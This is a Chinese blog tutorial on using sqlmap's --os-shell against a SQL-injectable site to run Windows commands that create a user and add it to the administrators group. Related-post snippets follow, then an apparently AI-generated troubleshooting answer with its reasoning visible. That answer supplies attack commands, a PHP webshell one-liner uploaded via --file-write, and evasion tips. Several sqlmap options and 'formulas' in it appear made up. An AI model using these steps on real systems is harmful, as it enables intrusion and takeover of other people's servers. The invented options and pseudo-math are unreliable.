Kali渗透学习(2)——sqlmap使用--os-shell添加管理员

sqlmap提权实战
最新推荐文章于 2025-09-17 14:19:44 发布
原创 最新推荐文章于 2025-09-17 14:19:44 发布 · 1.7k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux

Kali渗透学习(2)——sqlmap使用–os-shell添加管理员

首先要使用 --os-shell 来添加管理员用户,数据库要满足以下条件

1.你使用的数据库要有root权限

sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --is-dbs

2GPC处于关闭状态即magic_quotes_gpc = off,php主动转义的功能关闭

可以通过探针,或者测试特殊字符来确定是否关闭

3.secure_file_priv为空

使用sqlmap --os-shell

sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --os-shell

返回**os-shell>**表示成功了,这里列出了常用提权dos命令

列出用户 net user
添加用户 net user username password /add 注意密码至少包含一个符号
添加至管理员组 net localgroup administrators username

使用远程桌面链接

rdesktop ip:port

sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 5111
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
记一次sqlmap--os-shell的实战
weixin_53884648的博客
08-07 891
通过实战简单的进行sqlmap--os-shell的利用
SQLmap使用教程(2025版),零基础入门到精通,看这一篇就够了!
最新发布
Cairo_A的博客
09-17 870
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap
sqlmap工具使用
huangyongkang666的博客
03-21 4367
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
sqlmap (--os-shell)使用
m0_55628907的博客
09-06 416
1. 可通过抓包,输入不合法的字符让页面回显出根路径如:c:\appserv\www\phptest2\db_func.php我们需要猜测根目录是在 c:\appserv\www\phptest2\ 还是在 c:\appserv\www\
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1852
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
Web安全攻防的学习——04—(Sqlmap性能优化、在kali中搭建Sqli-labs、虚拟机使用本机靶场、sqlmap自定义检测参数、sqlmap注入参数、sqlmap注入技术参数)(重要)
weixin_42118531的博客
02-27 1175
1、Sqlmap性能优化 sqlmap设置持久HTTP连接 优势:长连接避免浪费重复连接的网络开销 缺点:大量的长连接占用服务器资源 sqlmap中可以设置连接为持久连接。HTTP报文中设置connection:keep-alive 但是–keep-alive这个参数和–p’roxy这个参数相冲突,不能在一起使用 sqlmap设置不接收HTTP Bod 参数 --null-connec...
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3441
学习sqlmap自动注入
渗透测试工具使用——sqlmap
qq_53633989的博客
05-08 467
sqlmap支持五种不同的注入模式:l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;l 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;l 联合查询注入,可以使用union的情况下的注入;l 堆查询注入,可以同时执行多条语句的执行时的注入。
kali】34 WEB渗透——扫描工具w3af_console
(∪.∪ )...zzz的博客
12-07 6596
这里写自定义目录标题一、简介1.plugin2. kali 安装w3af[问题解决]二、 操作1. 启动帮助2.plugins模块开启三个插件模块扫描所有插件模块3. profiles 模块4.http-settings 模块5.misc-settings (杂项设置)模块6.target 模块7.启动8.脚本 w3af_console 一、简介 web扫描框架(开源、不断添加 集成exploit模块 1.plugin audit(审计):该类插件会向Crawl插件爬取出的注入点发送特制的POC数据以
vulnhub——Ai-Web1靶机渗透
qq_63034068的博客
07-20 1230
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段。sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表。我们再去扫一下另一个路径,我们看到了一个php文件。
sqlmap--os-shell
m0_71300782的博客
09-06 1237
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
Sqlmap的getshell使用--os-shell
bring_coco的博客
03-16 1万+
环境:sqli-lab靶场+phpstudy。
sqlmap--os-shell)的使用
weixin_45815516的博客
01-01 632
以pikachu靶场字符型sql注入为例演示sqlmap中的--os-shell的用法
Kali Linux添加、切换用户
热门推荐
HAPPY
08-14 3万+
1.打开终端,输入  useradd -m username  (将username换成你想要的用户名) 2.更改密码: 在终端输入 passwd username (需要输入两次)       3.将我们创建的用户添加到sudo用户组。(这样我们创建的用户才能进行安装软件,允许打印。使用特权模式等操作。不然我们创建的用户就只能进行浏览。没有实际意义) 输入:usermod -a -G s...
Kali添加普通用户
The code way of kinnisoy
04-18 6139
刚装好的kali用户名默认是 root,密码是安装过程中自己设置的。 进去之后发现 #whoami之后,默认直接是root权限,想要添加一个普通用户怎么办呢? 使用命令: useradd -m [user_name] #添加新用户 passwd [user_name] #新用户设置密码 在普通用户和管理员之间切换可以使用命令: su [user_name] #切换...
Kali与编程:解决客户端无法正确加入域,以及如何将客户端加入域
Kali与编程
07-05 692
实验说明:本章节将教大家如何解决从域服务器端克隆出的虚拟机作为客户端却无法正确加入域的问题。 实验环境:安装一台windows server2019并在关机状态下新建快照,再克隆一台作为客户端。 服务器端ip地址:192.168.159.129 dns地址:192.168.159.129 客户端ip地址:192.168.159.132 dns地址:192.168.159.129 (根据实际网卡获取地址) 进行实验 在vmware软件上找到安装好的server2019 右击打开选项卡,点击“管理”工具 .
网络安全与网站安全及计算机安全:如何使用Kali Linux获取Windows计算机操作系统管理员权限【维持】
Kali与编程
12-14 6010
一、背景介绍 Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习! 二、资源装备 1.成功拿下的 Win7虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、安全演练 3.
kalisqlmap--os-shell的no autput
04-22
<think>好的,我现在需要帮助用户解决在Kali使用sqlmap--os-shell选项时没有输出的问题。首先,我应该回顾用户之前的对话和提供的引用,看看有没有相关的信息可以参考。 用户之前提到过关于--os-shell参数导致无输出的解决方案,涉及权限、网络、依赖、缓冲和环境限制。现在用户的具体问题是在Kali使用sqlmap时遇到同样的问题,我需要将这些通用解决方案具体应用到sqlmap的场景中。 首先,用户提供的引用中,引用[2]提到使用Kali虚拟机上传文件,可能涉及到环境配置的问题。这可能意味着用户的环境可能存在兼容性问题,但Kali本身是为渗透测试设计的,可能已经预装了很多工具,但需要检查依赖是否完整。 然后,用户之前的回答中提到了权限验证、网络诊断、依赖检查、输出缓冲处理和环境限制。我需要将这些步骤应用到sqlmap的特定情况中。 1. **权限问题**:sqlmap需要足够的权限来执行系统命令。在Kali中,用户可能没有使用root权限运行sqlmap,导致无法获取shell。解决方法可能是建议用户使用sudo运行sqlmap2. **网络连接**:--os-shell通常通过反向连接或绑定shell实现,需要目标机器能够连接到攻击者的机器。需要检查防火墙设置,确保监听端口开放,并且没有出站限制。用户可能需要配置正确的监听端口,或者使用反向代理。 3. **依赖组件**:sqlmapos-shell功能依赖于特定的数据库功能,如PostgreSQL的COPY或MySQL的INTO OUTFILE。需要确认目标数据库支持这些功能,并且sqlmap能够正确利用它们。此外,Kali中可能需要安装额外的依赖库,如python3或某些数据库驱动。 4. **输出缓冲**:sqlmap的输出可能被缓冲,导致用户看不到实时输出。可以建议用户强制刷新输出,比如使用unbuffer工具,或者在Python脚本中修改缓冲设置。 5. **目标环境限制**:目标系统可能禁用了某些功能,如命令执行或文件写入权限,或者存在防病毒软件拦截。需要检查目标环境的配置,尝试不同的注入技术绕过限制。 另外,用户提供的引用[1]中的脚本是用于测试工具输出的,可能与当前问题无关,但可以忽略。引用[2]提到Kali VM的使用,可能需要确认用户是否正确配置了Kali的环境,尤其是网络设置。 可能的解决方案步骤包括: - 使用sudo运行sqlmap,确保有足够权限。 - 检查监听端口是否被防火墙阻止,配置正确的IP和端口。 - 确认目标数据库支持文件写入和命令执行。 - 安装必要的依赖,如socat或netcat。 - 使用--flush-session清除缓存,或启用详细日志--verbose调试。 - 尝试不同的os-shell选项,如--os-pwn或--os-smbrelay。 需要将这些步骤详细列出,并给出具体的命令示例,如使用sudo sqlmap,配置--os-cmd等参数,安装依赖的命令等。同时,要参考用户之前的回答结构,分步骤解释,并加入相关的LaTeX公式和代码块,确保格式正确。 最后,生成相关问题,帮助用户进一步解决可能遇到的问题,比如如何验证数据库支持os-shell,或者如何绕过目标防火墙限制等。</think>#### Kalisqlmap的`--os-shell`无输出解决方案 --- ### 一、核心问题定位 `--os-shell`功能依赖数据库的文件写入和系统命令执行权限,无输出通常由以下原因导致: 1. **权限不足**:数据库账户缺少文件写入权限或系统命令执行权限 2. **网络阻断**:反向连接被防火墙拦截 3. **依赖缺失**:目标系统缺少命令执行环境 4. **输出缓冲**:数据库响应未正确解析 5. **注入点限制**:数据库配置阻止文件操作 --- ### 二、分步解决方案 #### 1. 权限验证 ```bash # 使用高权限数据库账户 sudo sqlmap -u "http://target.com/vuln.php?id=1" --os-shell --dbms=mysql --privileges ``` $$ \text{权限验证公式:} \exists (FILE\_PRIV, SUPER) \in PrivilegeSet \Rightarrow P_{success} \uparrow $$ **验证方法**: ```sql -- 检查MySQL权限 SHOW GRANTS FOR current_user(); -- 确认包含FILE权限 ``` #### 2. 网络配置优化 ```bash # 强制指定监听IP和端口(示例IP:192.168.1.10,PORT:4444) sqlmap -u [URL] --os-shell --os-cmd=netcat --listen-address=192.168.1.10 --listen-port=4444 ``` $$ \text{网络连通条件:} \forall p \in P_{required}, \exists t \in T_{open} \Rightarrow \frac{\partial Connection}{\partial t} > 0 $$ **检测工具**: ```bash # 验证端口连通性 nc -vnlp 4444 # 攻击机监听 tcpdump -i eth0 port 4444 # 抓包验证 ``` #### 3. 依赖组件处理 **Kali环境准备**: ```bash # 安装必要工具 sudo apt install socat netcat-traditional python3-impacket ``` **目标系统要求**: - 必须存在`netcat`、`bash`或`python`等基础shell环境 - 支持反向连接(若使用反向shell模式) #### 4. 注入技术选择 ```bash # 尝试不同注入方式 sqlmap -u [URL] --os-shell --technique=BEUSTQ ``` | 技术参数 | 描述 | |----------|-----------------------| | `--technique=B` | 布尔型盲注 | | `--file-write` | 上传自定义执行脚本 | **示例上传webshell**: ```bash echo '<?php system($_GET["cmd"]);?>' > shell.php sqlmap -u [URL] --file-write=shell.php --file-dest=/var/www/html/shell.php ``` #### 5. 调试与日志分析 ```bash # 启用详细日志 sqlmap -u [URL] --os-shell --verbose 6 --output-dir=./sqlmap_logs # 实时输出调试 grep -rin "os-shell" ./sqlmap_logs/*.log ``` --- ### 三、高级绕过技巧 #### 1. 编码绕过过滤 ```bash # 使用base64编码命令 sqlmap -u [URL] --os-shell --encode=base64 ``` $$ \text{编码转换方程:} C_{payload} = \text{Base64}( \text{Reverse}( \text{XOR}(P_{original}) ) ) $$ #### 2. 替代协议选择 ```bash # 使用ICMP隧道(需目标安装ptunnel) sqlmap -u [URL] --os-shell --os-cmd=ptunnel ``` #### 3. 内存加载执行 ```python # 通过Python内存加载(引用[1]方法优化) sqlmap -u [URL] --os-cmd="python -c 'import os; os.system(\"ls -la\")'" ``` --- ### 四、验证流程 1. 测试基础命令执行: ```bash sqlmap -u [URL] --os-cmd=id ``` 2. 检查临时文件生成: ```bash find /tmp -name "sqlmap*" -mmin -5 ``` 3. 验证网络会话: ```bash ss -antp | grep '4444' ``` --- ### 五、故障树分析 ```mermaid graph TD A[无输出] --> B{权限问题} A --> C{网络问题} A --> D{依赖缺失} B --> B1[检查数据库FILE权限] B --> B2[尝试SUDO提权] C --> C1[验证端口连通性] C --> C2[关闭本地防火墙] D --> D1[确认目标存在/bin/sh] D --> D2[上传静态编译的busybox] ``` --- ### 相关问题 1. 如何判断目标数据库是否支持`INTO OUTFILE`操作? 2. 当目标禁用反向连接时如何建立正向shell? 3. 怎样通过Wireshark分析sqlmap的`--os-shell`通信流量? 4. 为什么需要指定`--dbms`参数来提升os-shell成功率? 5. 如何利用DNS隧道突破严格的网络隔离?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值